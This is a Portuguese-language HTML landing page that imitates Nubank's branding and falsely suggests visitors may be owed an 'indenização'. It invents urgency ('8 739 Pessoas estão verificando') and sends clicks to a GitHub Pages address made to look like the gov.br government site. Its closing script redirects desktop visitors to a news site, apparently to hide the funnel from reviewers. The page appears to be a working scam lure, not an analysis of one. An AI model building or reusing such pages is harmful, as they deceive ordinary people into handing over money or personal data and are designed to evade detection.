 <!DOCTYPE html><html lang="pt-BR"><head>

<script>
  window.pixelId = "679511fc4d2a9fd63ee73c6b";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Programa de Avaliação</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            font-family: 'Graphik', -apple-system, BlinkMacSystemFont, 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Fira Sans', 'Droid Sans', 'Helvetica Neue', sans-serif;
            height: 100%;
            line-height: 1.5;
        }
        body {
            background-image: url('images/mymvl1i.png');
            background-size: cover;
            background-position: center;
            color: white;
            display: flex;
            flex-direction: column;
        }
        .logo {
            width: 4rem; /* Redução do tamanho da logo para mobile */
            height: auto;
        }
        .menu-icon {
            width: 1.25rem;
            height: 1.25rem;
            cursor: pointer;
        }
        main {
            flex-grow: 1;
            display: flex;
            flex-direction: column;
            justify-content: center;
            padding: 1.5rem 1rem;
            max-width: 1200px;
            margin: 0 auto;
            width: 100%;
            box-sizing: border-box;
        }
        h1 {
            font-size: 2rem;
            margin-bottom: 0.2rem;
            font-weight: 700;
            line-height: 1.2;
        }
        p {
            font-size: 1rem;
            margin-bottom: 3rem;
            max-width: 600px;
        }
        .card {
            background-color: white;
            color: #1F0033;
            padding:1rem;
            border-radius: 2rem;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            max-width: 400px;
        }
        .card h2 {
            font-family: 'Roboto', sans-serif; /* Altere a fonte para Roboto */
            font-size: 1.6rem;
            margin-bottom: 1.rem;
            font-weight: 700; /* Mantenha o valor de peso alto para robustez */
        }
        label {
            display: block;
            margin-bottom: 0.5rem;
            font-size: 0.875rem;
            color: #666;
        }
        input {
            width: 100%;
            padding: 0.75rem;
            margin-bottom: 1rem;
            border: 1px solid #ccc;
            border-radius: 0.5rem;
            box-sizing: border-box;
            font-size: 1rem;
        }
        input:focus {
            outline: none;
            border-color: #820AD1; /* Cor do Nubank */
            box-shadow: 0 0 0 2px rgba(130, 10, 209, 0.2); /* Cor do Nubank */
        }
        button {
            width: 100%;
            padding: 0.75rem;
            background-color: #820AD1; /* Cor do Nubank */
            color: white;
            border: none;
            border-radius: 0.5rem;
            cursor: pointer;
            font-size: 1rem;
            display: flex;
            justify-content: center;
            align-items: center;
            transition: background-color 0.3s ease;
            animation: pulse 1.5s infinite;
        }
        button:hover {
            background-color: #5B058A; /* Tom mais escuro do roxo do Nubank */
        }
        .arrow-icon {
            margin-left: 0.5rem;
        }
        footer {
            padding: 1rem;
            text-align: center;
            font-size: 0.85rem;
            color: rgba(255, 255, 255, 0.7);
        }
        @keyframes pulse {
            0% {
                transform: scale(1);
                box-shadow: 0 0 0 rgba(130, 10, 209, 0.5); /* Cor do Nubank */
            }
            50% {
                transform: scale(1.05);
                box-shadow: 0 0 10px rgba(130, 10, 209, 0.7); /* Cor do Nubank */
            }
            100% {
                transform: scale(1);
                box-shadow: 0 0 0 rgba(130, 10, 209, 0.5); /* Cor do Nubank */
            }
        }
        @media (min-width: 768px) {
            main {
                flex-direction: row;
                align-items: center;
                justify-content: space-between;
            }
            .content {
                flex: 1;
                padding-right: 1rem;
            }
            .card {
                flex: 0 0 200px;
            }
        }
    </style>
</head>
<body>
    <header>
        <svg class="menu-icon" fill="none" stroke="#1F0033" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
        </svg>
    </header>

    <main>
        <div class="content">
            <h1>8 739 Pessoas estão verificando neste momento
.</h1>
            <p>.</p>
        </div>
        <div class="card">
            <h2>Para saber se a indenização no seu nome, Basta clicar abaixo e verificar agora!!</h2>
            <!-- Link para continuar com os parâmetros UTM -->
            <button id="continueButton" type="button">
                VERIFICAR AGORA
                <svg class="arrow-icon" width="16" height="16" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                    <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 5l7 7-7 7"></path>
                </svg>
            </button>
        </div>
    </main>

    <style>
        .additional-footer {
            padding: 0; 
            text-align: center;
            font-size: 0.7rem;
            color: rgba(255, 255, 255, 0.7);
            margin-top: -2rem;
        }
    </style>

    <script>
        // Função para obter os parâmetros UTM da URL atual
        function getUTMParameters() {
            const params = new URLSearchParams(window.location.search);
            const utm = {};
            ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content'].forEach(param => {
                if (params.has(param)) {
                    utm[param] = params.get(param);
                }
            });
            return utm;
        }

        // Quando o botão "Continuar" for clicado, redireciona para /quiz com os parâmetros UTM
        document.getElementById('continueButton').addEventListener('click', function() {
            const utmParams = getUTMParameters();
            const baseUrl = 'https://govbr1.github.io/noticias/'; // URL da próxima página
            const queryString = new URLSearchParams(utmParams).toString(); // Constrói a query string

            // Redireciona para a próxima página com os parâmetros UTM
            window.location.href = `${baseUrl}?${queryString}`;
        });
    </script>


</body></html>

<script>
  // Detectar se o usuário está usando um computador ou notebook
  if (!/Mobi|Android|iPhone|iPad|iPod|Windows Phone|BlackBerry/i.test(navigator.userAgent)) {
    // Redirecionar para o site do G1
    window.location.href = "https://g1.globo.com";
  }
</script>
